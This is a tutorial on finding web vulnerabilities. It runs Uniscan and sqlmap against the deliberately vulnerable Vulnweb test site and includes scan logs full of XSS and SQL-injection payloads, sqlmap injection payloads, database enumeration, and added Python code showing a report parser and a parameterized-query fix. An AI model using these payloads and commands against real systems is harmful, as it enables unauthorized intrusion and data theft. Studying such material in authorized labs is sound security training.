
HOW TO FIND VULNERABILITIES IN WEBSITES

There are many professionals in the job market whose role is to analyze application code in order to identify exploitable bugs and report the flaws they find to the developers, so that the flaws can be fixed and the security of the system strengthened.

Based on this topic, I had the idea of writing this article to teach attack techniques that are widely used to discover vulnerabilities in applications.

The techniques demonstrated here are web attacks, and the tests are run against the Vulnweb site, on which we have full permission to perform this kind of testing: it was created for exactly this purpose, to challenge, teach and motivate information security professionals to find flaws in applications.

For the exploitation, note that the Debian-based distribution "Kali Linux" is used, together with two very important tools that come pre-installed by default on this operating system.
  • Uniscan: a powerful web vulnerability scanner that looks for common flaws such as local file inclusion, remote command execution, remote file inclusion and SQL injection; it can also identify and enumerate web services, interesting files and directories, and server information.
  • SqlMap: an open source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities; this well-known software is also commonly used by crackers to break into SQL databases.

Uniscan – Web Application Penetration Testing Tool

In the Kali terminal, type the command "uniscan --help"; it prints the description of each option.
root@Kali2018-4:~# uniscan --help
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
OPTIONS:
-h help
-u <url> example: https://www.example.com/
-f <file> list of url's
-b Uniscan go to background
-q Enable Directory checks
-w Enable File checks
-e Enable robots.txt and sitemap.xml check
-d Enable Dynamic checks
-s Enable Static checks
-r Enable Stress checks
-i <dork> Bing search
-o <dork> Google search
-g Web fingerprint
-j Server fingerprint
usage:
[1] perl ./uniscan.pl -u http://www.example.com/ -qweds
[2] perl ./uniscan.pl -f sites.txt -bqweds
[3] perl ./uniscan.pl -i uniscan
[4] perl ./uniscan.pl -i "ip:xxx.xxx.xxx.xxx"
[5] perl ./uniscan.pl -o "inurl:test"
[6] perl ./uniscan.pl -u https://www.example.com/ -r

Next, type the command "uniscan -u http://testphp.vulnweb.com/ -qweds" so that the tool runs a general vulnerability check on the application.

root@Kali2018-4:~# uniscan -u http://testphp.vulnweb.com/ -qweds
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
Scan date: 10-2-2020 20:45:18
===================================================================================================
| Domain: http://testphp.vulnweb.com/
| Server: nginx/1.4.1
| IP: 176.28.50.165
===================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/Flash/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/admin/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/images/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/pictures/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/secured/
===================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/CVS/Entries
| [+] CODE: 200 URL: http://testphp.vulnweb.com/favicon.ico
| [+] CODE: 200 URL: http://testphp.vulnweb.com/index.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/login.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/search.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/userinfo.php?uid=1;
===================================================================================================
|
| Check robots.txt:
|
| Check sitemap.xml:
===================================================================================================
|
| Crawler Started:
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| [+] Crawling finished, 87 URL's found!
|
| E-mails:
| [+] E-mail Found: wvs@acunetix.com
|
| File Upload Forms:
|
| Timthumb:
|
| External hosts:
| [+] External Host Found: http://www.eclectasy.com
| [+] External Host Found: http://www.acunetix.com
| [+] External Host Found: https://www.acunetix.com
| [+] External Host Found: http://blog.mindedsecurity.com
|
| PHPinfo() Disclosure:
|
| Web Backdoors:
|
| Source Code Disclosure:
| [+] Source Code Found: http://testphp.vulnweb.com/pictures/wp-config.bak
|
| FCKeditor File Upload:
|
| Ignored Files:
| http://testphp.vulnweb.com/Flash/add.fla
| http://testphp.vulnweb.com/admin/create.sql
===================================================================================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 4 New directories added
|
|
| FCKeditor tests:
| Timthumb < 1.33 vulnerability:
| Backup Files:
| Blind SQL Injection:
| Local File Include:
| PHP CGI Argument Injection:
| Remote Command Execution:
| Remote File Include:
| SQL Injection:
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1'
[*] Remaining tests: 96
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1"
[*] Remaining tests: 95
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2'
[*] Remaining tests: 94
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2"
[*] Remaining tests: 93
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3'
[*] Remaining tests: 92
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3"
[*] Remaining tests: 91
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4'
[*] Remaining tests: 90
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4"
[*] Remaining tests: 89
[*] Remaining tests: 88
[*] Remaining tests: 87
[*] Remaining tests: 86
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1'
[*] Remaining tests: 85
[*] Remaining tests: 84
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1"
[*] Remaining tests: 83
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2"
[*] Remaining tests: 82
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2'
[*] Remaining tests: 81
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3'
[*] Remaining tests: 80
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3"
| [+] Vul [SQL-i] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123'&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><script>alert('XSS')</script>
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><IMG SRC="javascript:alert('XSS');">
[*] Remaining tests: 283
[*] Remaining tests: 282
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[*] Remaining tests: 281
[*] Remaining tests: 280
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
[*] Remaining tests: 279
[*] Remaining tests: 278
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
[*] Remaining tests: 277
[*] Remaining tests: 276
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><body onload="javascript:alert('XSS')"></body>
[*] Remaining tests: 275
[*] Remaining tests: 274
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><table background="javascript:alert('XSS')"></table>
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<script>alert('XSS')</script>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 163
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<IMG SRC="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<body onload="javascript:alert('XSS')"></body>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<table background="javascript:alert('XSS')"></table>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<script>alert('XSS')</script>&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<IMG SRC="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 136
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 135
[*] Remaining tests: 134
[*] Remaining tests: 133
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<body onload="javascript:alert('XSS')"></body>&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 132
[*] Remaining tests: 131
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<table background="javascript:alert('XSS')"></table>&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 130
[*] Remaining tests: 129
[*] Remaining tests: 128
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<script>alert('XSS')</script>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 127
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<IMG SRC="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 126
[*] Remaining tests: 125
[*] Remaining tests: 124
[*] Remaining tests: 123
[*] Remaining tests: 122
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 121
[*] Remaining tests: 119
[*] Remaining tests: 119
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 118
[*] Remaining tests: 117
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 116
[*] Remaining tests: 115
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<body onload="javascript:alert('XSS')"></body>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 114
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<table background="javascript:alert('XSS')"></table>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 113
[*] Remaining tests: 112
[*] Remaining tests: 111
[*] Remaining tests: 110
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<script>alert('XSS')</script>&signup=123&uaddress=123
[*] Remaining tests: 109
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<IMG SRC="javascript:alert('XSS');">&signup=123&uaddress=123
[*] Remaining tests: 108
[*] Remaining tests: 107
[*] Remaining tests: 106
[*] Remaining tests: 105
[*] Remaining tests: 104
[*] Remaining tests: 103
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&signup=123&uaddress=123
[*] Remaining tests: 102
[*] Remaining tests: 101
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&signup=123&uaddress=123
[*] Remaining tests: 100
[*] Remaining tests: 99
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&signup=123&uaddress=123
[*] Remaining tests: 98
[*] Remaining tests: 97
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<body onload="javascript:alert('XSS')"></body>&signup=123&uaddress=123
[*] Remaining tests: 96
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<table background="javascript:alert('XSS')"></table>&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<script>alert('XSS')</script>
[*] Remaining tests: 73
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<IMG SRC="javascript:alert('XSS');">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[*] Remaining tests: 65
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<body onload="javascript:alert('XSS')"></body>
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<table background="javascript:alert('XSS')"></table>
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<IMG SRC="javascript:alert('XSS');">&goButton=123
[*] Remaining tests: 54
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<script>alert('XSS')</script>&goButton=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&goButton=123
[*] Remaining tests: 47
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&goButton=123
[*] Remaining tests: 46
[*] Remaining tests: 45
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&goButton=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<body onload="javascript:alert('XSS')"></body>&goButton=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<table background="javascript:alert('XSS')"></table>&goButton=123
| Web Shell Finder:
===================================================================================================
| Static tests:
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.1 Loaded.
|
|
| Local File Include:
| Remote Command Execution:
| Remote File Include:

===================================================================================================
Scan end date: 11-2-2020 0:59:55
HTML report saved in: report/testphp.vulnweb.com.html
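The scan above prints one line per payload that triggered a finding, so the same endpoint appears dozens of times. The script below is an added example (it is not part of Uniscan or of the original article) that reads this text format, pairs each `[+] Vul` line with the `Post data:` line that may follow it, and groups the findings by vulnerability class, HTTP method, path and injected parameter, so the long log collapses into a short list a developer can act on. The embedded report is a constructed excerpt of the output shown above; treating a parameter whose value carries a quote or an angle bracket as the injected one is an assumption about Uniscan's payload style.

```python
"""Triage helper for Uniscan text reports (added example, not Uniscan's code)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# A finding line, e.g. "| [+] Vul [SQL-i] http://host/listproducts.php?cat=1'".
# Payload URLs may contain spaces, so the URL runs to the last non-space char.
VUL_RE = re.compile(r"^\|\s*\[\+\] Vul \[(?P<kind>[^\]]+)\]\s+(?P<url>.*\S)")
# The optional follow-up line carrying the POST body that was sent.
POST_RE = re.compile(r"^\|\s*Post data:\s*(?P<data>.*)$")
# Assumption: the tampered parameter is the one whose value holds a quote or tag.
PAYLOAD_RE = re.compile(r"""['"<>]""")

# Constructed excerpt of the scan output above (same format, fewer lines).
SAMPLE_REPORT = """\
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1'
[*] Remaining tests: 96
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1"
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1'
| [+] Vul [SQL-i] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123'&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><script>alert('XSS')</script>
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<script>alert('XSS')</script>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<IMG SRC="javascript:alert('XSS');">&goButton=123
"""


def split_params(query):
    """Split a query string or POST body on '&' and the first '=' only.

    Done by hand rather than with parse_qsl so that '=' and ';' inside a
    payload (e.g. CONTENT="0; URL=...") do not split the value.
    """
    params = []
    for pair in query.split("&"):
        if not pair:
            continue          # leading '&' in Uniscan's Post data lines
        name, _, value = pair.partition("=")
        params.append((name, value))
    return params


def injected_params(query):
    """Names of the parameters whose value carries a payload."""
    return {name for name, value in split_params(query)
            if name and PAYLOAD_RE.search(value)}


def parse_uniscan(text):
    """Return {(kind, method, path): {param, ...}} for every finding in the report."""
    lines = text.splitlines()
    findings = defaultdict(set)
    i = 0
    while i < len(lines):
        m = VUL_RE.match(lines[i])
        if not m:
            i += 1
            continue
        kind, parts = m.group("kind"), urlsplit(m.group("url"))
        post = POST_RE.match(lines[i + 1]) if i + 1 < len(lines) else None
        if post:
            # The URL is the form action; the payload travelled in the body.
            method, params = "POST", injected_params(post.group("data"))
            i += 2
        else:
            method, params = "GET", injected_params(parts.query)
            i += 1
        findings[(kind, method, parts.path)].update(params)
    return dict(findings)


def summarize(findings):
    """One human-readable line per (kind, method, path)."""
    return [f"{kind} {method} {path}: {', '.join(sorted(params))}"
            for (kind, method, path), params in sorted(findings.items())]


if __name__ == "__main__":
    for line in summarize(parse_uniscan(SAMPLE_REPORT)):
        print(line)
```

Run it as-is to see the constructed excerpt reduced to five lines; on a real scan, pipe `uniscan`'s output into `parse_uniscan` instead of `SAMPLE_REPORT`.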

sqlmap commands

Just as we typed help to discover what each uniscan option does, we will do the same with SqlMap. Type the command "sqlmap --help".

root@Kali2018-4:~# sqlmap --help
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.10#stable}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
Usage: python sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header value
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard Simple wizard interface for beginner users
[!] to see full list of options run with '-hh'

After scanning the application, if any vulnerability was found, move on to the next step.
Choose one of the vulnerable links that Uniscan returned and work on it. In my case I will take the link "http://testphp.vulnweb.com/listproducts.php?cat=1". Remember that the tool returned not only SQL injection vulnerabilities but other vulnerabilities as well; here we will exploit the SQL injection vulnerability it identified.
With this vulnerability it is possible to collect information from the application's database and to manipulate its data.
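Before exploiting the finding, it helps to see why `listproducts.php?cat=1` is vulnerable and what the fix looks like. The snippet below is an added example, not the site's code (Vulnweb is PHP on MySQL; this reproduces the pattern in Python with an in-memory SQLite database and an assumed `products` table with a `cat` column). It shows a string-concatenated query reacting to the page's own probes, `cat=1'` raising a database error and `cat=1 AND 9252=9252` returning the normal rows, beside a version that validates the type and binds the value as a parameter, so the same inputs are simply rejected.

```python
"""Why cat=1' and cat=1 AND 9252=9252 work, and the fix (added example, not Vulnweb's code)."""
import sqlite3


def make_db():
    """Constructed stand-in for the acuart database: a small products table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, cat INTEGER);
        INSERT INTO products VALUES (1, 'poster', 1), (2, 'print', 1), (3, 'sculpture', 2);
    """)
    return conn


def list_products_vulnerable(conn, cat):
    """The anti-pattern: the raw request value is pasted into the SQL text.

    Whatever arrives in `cat` is parsed as SQL, so a stray quote breaks the
    statement (error-based signal) and an appended condition is evaluated
    (boolean-based signal).
    """
    sql = "SELECT name FROM products WHERE cat = " + cat
    return [row[0] for row in conn.execute(sql)]


def list_products_safe(conn, cat):
    """The fix: validate the type, then bind the value as a parameter.

    The SQL text is a constant; the database receives `cat` as data and
    never parses it, so there is no injection surface left.
    """
    try:
        cat_id = int(cat)
    except ValueError:
        raise ValueError("cat must be an integer")
    rows = conn.execute("SELECT name FROM products WHERE cat = ?", (cat_id,))
    return [row[0] for row in rows]


def probe(handler, conn, value):
    """Run one handler on one value and report what an observer would see."""
    try:
        return handler(conn, value)
    except sqlite3.OperationalError:
        return "database error"   # the signal error-based detection looks for
    except ValueError:
        return "rejected"         # input validation refused the value


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "1 AND 9252=9252", "1 AND 9252=9253"):
        print(f"cat={value!r:22} vulnerable -> {probe(list_products_vulnerable, db, value)}")
        print(f"cat={value!r:22} safe       -> {probe(list_products_safe, db, value)}")
```

The difference between `1 AND 9252=9252` (normal rows) and `1 AND 9252=9253` (no rows) in the vulnerable handler is exactly the true/false oracle that sqlmap's "boolean-based blind" technique relies on; the safe handler gives the same answer to both, so the oracle disappears.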


We need to find out which database management system is running behind the application and the name of the database it uses.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.10#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:26:01

[22:26:01] [INFO] resuming back-end DBMS 'mysql' 
[22:26:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 9252=9252

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cat=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[22:26:04] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[22:26:04] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[22:26:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'


[*] shutting down at 22:26:05

It was possible to collect several important pieces of information that should not be exposed. MySQL is the database management system running behind this application, and two databases were identified, named acuart and information_schema.
Let's find out how many tables the application uses and what they are called.
We will work with the acuart database for these tests.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart --table
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.2.10#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
